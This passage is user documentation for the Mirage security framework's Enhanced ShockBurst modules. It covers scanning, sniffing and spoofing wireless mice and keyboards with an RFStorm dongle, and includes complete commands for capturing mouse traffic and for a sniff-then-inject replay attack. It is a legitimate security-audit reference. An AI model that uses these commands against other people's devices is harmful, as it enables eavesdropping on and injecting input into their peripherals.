List of Enhanced ShockBurst Modules

esb_info

Presentation

esb_info displays some informations about a specific interface. The supported devices and their corresponding interfaces are listed here. The displayed informations and the output parameters changes according to the provided interface.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX,<filename>.pcap

Interface to display

SHOW_CAPABILITIES

yes

yes|no

Indicates if the capabilities of the interface should be displayed

Output parameters

  • If the interface provided is rfstormX:

Name

Possible values

Description

INTERFACE

rfstormX

Selected interface

MODE

PROMISCUOUS | GENERIC_PROMISCUOUS | SNIFFER

Mode currently in use in the selected interface

INDEX

#X

Device’s index number

  • If the interface provided is <filename>.pcap:

Name

Possible values

Description

INTERFACE

<filename>.pcap

Selected interface

MODE

read | write

Mode in use

Usage

If you want to display the informations related to an RFStorm interface :

$ mirage esb_info INTERFACE=rfstorm0
[INFO] Module esb_info loaded !
┌───────────┬──────────────┬─────────────┐
│ Interface │ Device Index │ Mode        │
├───────────┼──────────────┼─────────────┤
│ rfstorm0  │ #0           │ PROMISCUOUS │
└───────────┴──────────────┴─────────────┘
[INFO] Mirage process terminated !

esb_scan

Presentation

esb_scan allows to identify Enhanced ShockBurst devices thanks to the promiscuous mode provided by the RFStorm Device. It allows to provide a specific range of channels to scan using the START_CHANNEL and END_CHANNEL parameters. There is a possiblity to limit the execution time with the TIME parameter (execution duration in seconds). If this parameter is set to an empty string (“”), the execution doesn’t automatically stop.

Warning

Please note the fact that in promiscuous mode, only a subset of frames are received by the device. It may require multiple executions in order to identify your target.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

START_CHANNEL

0

<integer>

First channel of the range to scan

END_CHANNEL

99

<integer>

Last channel of the range to scan

TIME

10

<integer>

Execution duration

Output parameters

If no devices have been identified, no output parameters are generated. If there is only one device identified, the output parameters are listed in the following table :

Name

Possible values

Description

TARGET

<ESB address>

ESB address of the identified device

PROTOCOL

logitech|microsoft|chicony|generic

Applicative protocol of the identified device

If multiple devices have been identified, the same output parameters are generated, but are suffixed by the number of the device :

Name

Possible values

Description

TARGET1

<ESB address>

ESB address of the first identified device

PROTOCOL1

logitech|microsoft|chicony|generic

Applicative protocol of the first identified device

TARGET2

<ESB address>

ESB address of the second identified device

PROTOCOL2

logitech|microsoft|chicony|generic

Applicative protocol of the second identified device

Usage

If you want to list the devices during 10 seconds :

$ mirage esb_scan
[INFO] Module esb_scan loaded !
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 74       │ logitech │
└────────────────┴──────────┴──────────┘
[INFO] Mirage process terminated !

If you want to list the devices using the interface rfstorm1 without stopping the module after 10 seconds, use the following input parameters:

$ mirage esb_scan INTERFACE=rfstorm1 TIME=""
[INFO] Module esb_scan loaded !
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 74       │ logitech │
└────────────────┴──────────┴──────────┘
[...]

Finally, you can provide a range of channels to scan using the END_CHANNEL and START_CHANNEL parameters:

$ mirage esb_scan START_CHANNEL=10 END_CHANNEL=50
[INFO] Module esb_scan loaded !
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 48,44    │ logitech │
└────────────────┴──────────┴──────────┘
[INFO] Mirage process terminated !

esb_sniff

Presentation

esb_sniff passively sniffs Enhanced ShockBurst frames. It works with a RFStorm Device, allowing to use the two implemented modes (promiscuous and normal) in order to capture frames. It can also export the sniffed data in a PCAP file (at the path given in the PCAP_FILE parameter).

You can choose the channels to monitor thanks to the CHANNELS parameter. You can provide multiple values :

  • all: all the channels are used

  • X-Y: the channels from X to Y are used

  • X,Y,Z: the channels X, Y and Z are used

  • X-Y,Z: the channels X to Y and Z are used

By default, the module performs an active scan before the sniffing process: it transmits a ping request on every channel included in the channels map until an acknowledgment frame is received. Then, it switches to sniffing mode. It requires to provide a target address (TARGET parameter). If you don’t provide any target (or if you provide the value “FF:FF:FF:FF:FF”), the module will automatically switch in passive scan mode.

If you want to perform a passive scan, you must set the ACTIVE_SCAN parameter to no. As a result, no ping request will be transmitted, and the device will explore the provided channels in order to discover frames transmitted by your target.

By default, only the frames transmitted by PTX devices are captured. If you want to capture the acknowledgment frames, you have to set the ACK_PACKETS parameter to yes.

There is a possiblity to limit the execution time with the TIME parameter (execution duration in seconds). If this parameter is set to an empty string (“”), the execution doesn’t automatically stop.

Finally, some devices are using channel hopping and regularly move to another channel, so this module allows to easily control its behaviour when no frames are received. You can provide a channel timeout (CHANNEL_TIMEOUT parameter) and what to do when the timeout is reached (using the LOST_STREAM_ACTION parameter, which can be set to continue or stop).

  • continue: if this mode is selected, the module performs a new scan to find the target when the channel timeout is reached

  • stop: if this mode is selected, the module stops its execution when the channel timeout is reached

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

TARGET

<ESB adress>

Address of the target device

CHANNELS

all

all|X|X-Y|X,Y||X-Y,Z

Channels to monitor

TIME

<integer>

Execution duration

ACK_PACKETS

no

yes|no

Acknowledgment frames have to be captured

ACTIVE_SCAN

yes

yes|no

Active scan mode

CHANNEL_TIMEOUT

20

<integer>

Timeout duration when no frame are received on the current channel

LOST_STREAM_ACTION

continue

continue|stop

Behaviour to execute when the channel timeout is reached

PCAP_FILE

<file path>

PCAP export file

MOUSE_FILE

<file path>

Mouse movement export file

Output parameters

Name

Possible values

Description

TARGET

<ESB address>

ESB address of the target

MOUSE_FILE

<file path>

Mouse movement export file

PCAP_FILE

<file path>

PCAP export file

CHANNEL

<integer>

Last channel used by the target

Usage

Basic Usage

If you want to sniff a specific target, you have to provide the TARGET parameter :

$ mirage esb_sniff TARGET=E8:46:F9:2F:A4
[INFO] Module esb_sniff loaded !
[INFO] Sniffing mode enabled !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=5 | y=8 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=5 | y=8 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=6 | y=12 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=6 | y=12 >>
[...]

If you don’t know what is your target address, uses the following value as TARGET :

$ mirage esb_sniff TARGET=FF:FF:FF:FF:FF
[INFO] Module esb_sniff loaded !
[INFO] Promiscuous mode enabled ! Only a subset of frames will be sniffed.
[WARNING] Active scanning not compatible with promiscuous mode, ACTIVE parameter will be ignored.
[INFO] Channels: 0-99
[INFO] Looking for an active channel for FF:FF:FF:FF:FF...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=8 | y=9 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=8 | y=9 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=12 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=12 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-16 | y=6 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-16 | y=6 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-10 | y=-2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-10 | y=-2 >>
[...]

Warning

If you use this feature, please keep in mind that only a subset of frames will be captured because of some limitations of the promiscous mode.

You can select a specific subset of channels to monitor thanks to the CHANNELS parameter :

$ mirage esb_sniff TARGET=E8:46:F9:2F:A4 CHANNELS=5,8,72,76
[INFO] Module esb_sniff loaded !
[INFO] Sniffing mode enabled !
[INFO] Channels: 5,8,72,76
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=0 | y=11 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=0 | y=11 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=12 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=12 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=14 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=14 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-6 | y=15 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-6 | y=15 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=10 >>
[...]

You can also use a passive scan if you don’t want to transmit ping request at the beginning of the module execution (ACTIVE_SCAN):

$ mirage esb_sniff TARGET=E8:46:F9:2F:A4 ACTIVE_SCAN=no
[INFO] Module esb_sniff loaded !
[INFO] Sniffing mode enabled !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=-4 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=-4 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=-4 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=-4 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-5 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-5 >>
[...]

If you want to export the collected data to a PCAP file, uses the following command:

$ mirage esb_sniff TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/out.pcap
[INFO] Module esb_sniff loaded !
[INFO] Sniffing mode enabled !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-1 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-1 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-4 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-4 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-2 | y=-4 >>
[...]

Performing a replay attack

This module can be combined with esb_inject in order to perform a replay attack:

$ mirage "esb_sniff|esb_inject" esb_sniff1.TARGET=E8:46:F9:2F:A4 esb_sniff1.TIME=5 esb_sniff1.PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_sniff loaded !
[INFO] Module esb_inject loaded !
[INFO] Sniffing mode enabled !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[...]
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=255 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

Capturing and displaying the mouse movements

This module can be combined with mouse_visualizer in order to generate an animated GIF displaying the mouse movement:

$ mirage "esb_sniff|mouse_visualizer" esb_sniff1.TARGET=E8:46:F9:2F:A4 esb_sniff1.TIME=5 esb_sniff1.MOUSE_FILE=/tmp/mouse.capture mouse_visualizer2.GIF_FILE=/tmp/mouse.gif
[INFO] Module esb_sniff loaded !
[INFO] Module mouse_visualizer loaded !
[INFO] Sniffing mode enabled !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=0 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=0 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=-1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=1 | y=-2 >>
[...]
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-1 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-1 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Hello / Set Timeout Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | button=right | x=0 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | button=right | x=0 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Hello / Set Timeout Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[SUCCESS] Sniffed mice datas are saved as /tmp/mouse.capture (CFG file format)
[INFO] Importing mice datas from /tmp/mouse.capture ...
[INFO] Mirage process terminated !

It produces a GIF animated file similar to the following one:

_images/mousevisualizer_example.gif

esb_inject

Presentation

esb_inject allows to inject Enhanced ShockBurst frames. It works with a RFStorm Device. It imports the frames stored in a PCAP file (provided as PCAP_FILE parameter) and uses the provided interface to inject them.

You have to provide a target using the TARGET parameter. If no target is provided (or the value provided is “FF:FF:FF:FF:FF”), every frame contained in the PCAP file are transmitted. Else, only the frames corresponding to the provided target will be transmitted. You can choose the injection channel thanks to the CHANNEL parameter. You can provide multiple values :

  • auto: an active scan is performed in order to find the target

  • X: the channel X is used

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

TARGET

<ESB adress>

Address of the target device

CHANNEL

auto

auto|<integer>

Injection channel

PCAP_FILE

<file path>

PCAP file

Output parameters

This module doesn’t provide any output parameters.

Usage

Basic Usage

If you want to inject frames to a specific target, you have to provide the TARGET parameter:

$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 17
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

If you don’t provide the TARGET parameter, every frame contained in the PCAP file will be transmitted:

$ mirage esb_inject PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.
[INFO] Looking for an active channel for FF:FF:FF:FF:FF...
[SUCCESS] Channel found: 12
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

You can select a specific channel thanks to the CHANNEL parameter :

$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap CHANNEL=12
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

Performing a replay attack

This module can be combined with esb_sniff in order to perform a replay attack:

$ mirage "esb_sniff|esb_inject" esb_sniff1.TARGET=E8:46:F9:2F:A4 esb_sniff1.TIME=5 esb_sniff1.PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_sniff loaded !
[INFO] Module esb_inject loaded !
[INFO] Sniffing mode enabled !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[...]
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=255 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

esb_prx

Presentation

esb_prx simulates a PRX device’s behaviour. It is a core module for the framework, allowing to quickly build recurrent behaviours during a security audit. If a scenario is provided, the module is launched in “scenario” mode, with events given as callbacks on specific packet types, allowing to implement complex interactions. Otherwise, it is launched in “interpreter” mode, opening a CLI for the user.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

TARGET

<ESB address>

Target address

SCENARIO

<scenario>

Scenario to use

Scenario signals

The behaviour of this module can be modified using scenarios. If you need more details about Mirage scenarios, their usage is described here. The following signals are generated by this module if a scenario is provided using the SCENARIO input parameter :

Signal

Parameters

Activation

Default behaviour

onStart

when the module starts its execution

nothing is executed

onEnd

when the module stops its execution

nothing is executed

onKey

key

when a key is pressed

nothing is executed

onIncomingPacket

packet

when an incoming packet is received (from PTX)

nothing is executed

You can manually stop the module’s execution by calling the method stopScenario:

self.module.stopScenario()

Commands

The following commands are available in the CLI interface :

  • clear : clears the screen

  • channel : displays the current channel

  • channel <channel> : moves to the provided channel

  • scan : calls the esb_scan module to list near ESB devices

  • scan <duration> : calls the esb_scan module for the specified duration to list near ESB devices

  • scan <duration> <start_channel> <end_channel> : calls the esb_scan module for the specified duration on the specified channel range to list near ESB devices

  • address : displays the address currently selected

  • address <ESB address> : changes the address to the one provided

  • show : displays the received frames

  • auto_ack : enables or disables the auto ACK mode

  • send <payload> : sends an acknowledgement payload to the PTX (if the auto ACK mode is enabled, the frame will be transmitted when a new frame is received)

  • send <payload1>,<payload2>,… : sends multiple acknowledgment payloads to the PTX (if the auto ACK mode is enabled, the frames will be transmitted when new frames are received)

  • exit : ends the execution

Usage

CLI mode

If you want to use this module in CLI mode, just calls the module without input parameters :

$ mirage esb_prx
[INFO] Module esb_prx loaded !
[PRX|71]:

You can easily scan the devices using the scan command :

[PRX|47]: scan
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 8,14     │ logitech │
└────────────────┴──────────┴──────────┘
[...]
┌────────────────┬───────────────────────────────────────┬──────────┐
│ Address        │ Channels                              │ Protocol │
├────────────────┼───────────────────────────────────────┼──────────┤
│ E8:46:F9:2F:A4 │ 32,65,35,36,69,71,8,74,44,45,14,17,62 │ logitech │
└────────────────┴───────────────────────────────────────┴──────────┘

Then, you can select a specific address using address :

[PRX|98]: address E8:46:F9:2F:A4
[PRX|98|E8:46:F9:2F:A4]:

You can set the channel using channel command :

[PTX|98|E8:46:F9:2F:A4]: channel 8
[PTX| 8|E8:46:F9:2F:A4]:

You can automatically transmit ACK frames using the auto_ack command :

[PRX| 8|E8:46:F9:2F:A4]: auto_ack
[INFO] Auto ACK enabled !

You can monitor the received frames using the show command :

[PRX| 8|E8:46:F9:2F:A4]: show
[INFO] Received frames: (Ctrl + C to exit)
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>
[PACKET] [ CH:8 ] << ESB - Logitech Keepalive Packet (logitech) | address=E8:46:F9:2F:A4 | timeout=85 >>

Finally, you can easily transmit ACK payloads using send:

[PRX| 8|E8:46:F9:2F:A4]: send 0f0f0f
[INFO] The specified ACK payloads will be transmitted automatically when a new frame is received.

Customizing the behaviour using scenarios

If you want to use a scenario, you can use the create_scenario command in order to generate a basic code :

$ mirage --create_scenario
[QUESTION] Scenario's name : esb_prx_test
[SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_prx_test.py
[INFO] Mirage process terminated !

Then, you can modify the code as you want.

If you want to use this scenario, just provide its name as the value of the input parameter SCENARIO :

$ sudo mirage esb_prx SCENARIO=esb_prx_test
[INFO] Module esb_prx loaded !
[INFO] Scenario loaded !
[...]
[INFO] Mirage process terminated !

esb_ptx

Presentation

esb_ptx simulates a PTX device’s behaviour. It is a core module for the framework, allowing to quickly build recurrent behaviours during a security audit. If a scenario is provided, the module is launched in “scenario” mode, with events given as callbacks on specific packet types, allowing to implement complex interactions. Otherwise, it is launched in “interpreter” mode, opening a CLI for the user.

A follow mode is provided thanks to the FOLLOW_MODE parameter, allowing to regularly check if the corresponding PRX is responding on the current channel. It sends ping request every second and if no acknowledgement frame is received, then the module will automatically scan channels in order to find it.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

TARGET

<ESB address>

Target address

FOLLOW_MODE

yes

yes|no

Follow mode

SCENARIO

<scenario>

Scenario to use

Scenario signals

The behaviour of this module can be modified using scenarios. If you need more details about Mirage scenarios, their usage is described here. The following signals are generated by this module if a scenario is provided using the SCENARIO input parameter :

Signal

Parameters

Activation

Default behaviour

onStart

when the module starts its execution

nothing is executed

onEnd

when the module stops its execution

nothing is executed

onKey

key

when a key is pressed

nothing is executed

onESBAckResponse

packet

when an incoming acknowledgment is received (from PRX)

nothing is executed

onPingFailure

when the ping response acknowledgement is not received (from PRX)

nothing is executed

onPRXFound

when the PRX has been found by the scan initiated after the ping failure

nothing is executed

You can manually stop the module’s execution by calling the method stopScenario:

self.module.stopScenario()

Commands

The following commands are available in the CLI interface :

  • clear : clears the screen

  • channel : displays the current channel

  • channel <channel> : moves to the provided channel

  • scan : calls the esb_scan module to list near ESB devices

  • scan <duration> : calls the esb_scan module for the specified duration to list near ESB devices

  • scan <duration> <start_channel> <end_channel> : calls the esb_scan module for the specified duration on the specified channel range to list near ESB devices

  • address : displays the address currently selected

  • address <ESB address> : changes the address to the one provided

  • find_prx : performs an active scan in order to find the corresponding PRX

  • find_prx <channel_range> : performs an active scan in order to find the corresponding PRX in the selected channel range (e.g. “0-10”)

  • follow_prx : enables the follow mode

  • unfollow_prx : disables the follow mode

  • send <payload> : sends a specific payload to the PRX

  • send <payload1>,<payload2>,… : sends multiple payloads to the PRX

  • exit : ends the execution

Usage

CLI mode

If you want to use this module in CLI mode, just calls the module without input parameters :

$ mirage esb_ptx
[INFO] Module esb_ptx loaded !
[PTX|12]:

You can easily scan the devices using the scan command :

[PTX|99]: scan
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 8        │ logitech │
└────────────────┴──────────┴──────────┘
())))))))))))))))))))))))))))))))))))))))))))))))))___________) Channel: 81

Then, you can select a specific address using address :

[PTX|98]: address E8:46:F9:2F:A4
